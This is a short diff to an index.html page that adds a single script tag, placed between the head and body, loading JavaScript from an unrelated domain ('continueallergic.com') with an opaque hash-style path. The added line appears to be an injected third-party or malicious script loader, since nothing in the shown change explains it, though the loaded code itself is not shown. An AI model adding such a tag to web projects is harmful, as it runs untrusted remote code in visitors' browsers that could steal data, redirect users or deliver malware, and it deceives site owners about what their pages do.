--- a/index.html
+++ b/index.html
@@ -14,6 +14,7 @@
 	}
     </style>
 </head>
+<script type='text/javascript' src='//continueallergic.com/42/83/a7/4283a72346ebb5fbabc4db3b5a2ba666.js'></script>
 <body>
 
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
